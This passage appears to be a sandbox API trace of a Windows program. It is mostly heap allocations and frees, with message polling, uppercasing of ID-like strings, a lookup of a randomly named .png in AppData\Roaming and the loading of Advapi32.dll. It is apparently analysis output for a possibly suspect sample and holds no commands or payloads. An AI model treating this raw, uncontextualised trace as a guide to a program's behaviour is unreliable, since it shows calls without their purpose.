lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.490] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0149.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0149.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0149.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0149.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0149.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.491] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0149.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.493] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.493] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0149.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/PN5TTWYWv642BYt.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6602990, ftCreationTime.dwHighDateTime=0x1d5ca1f, ftLastAccessTime.dwLowDateTime=0x65ec1cd0, ftLastAccessTime.dwHighDateTime=0x1d5cd53, ftLastWriteTime.dwLowDateTime=0x65ec1cd0, ftLastWriteTime.dwHighDateTime=0x1d5cd53, nFileSizeHigh=0x0, nFileSizeLow=0x17b50, dwReserved0=0x0, dwReserved1=0x0, cFileName="PN5TTWYWv642BYt.png", cAlternateFileName="PN5TTW~1.PNG")) returned 0x9e2278 [0149.494] FindClose (in: hFindFile=0x9e2278 | out: hFindFile=0x9e2278) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0149.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0149.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0149.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0149.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0149.496] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.496] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0149.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.496] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.496] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.496] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.497] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.497] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0149.497] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0149.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.498] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0149.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0149.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 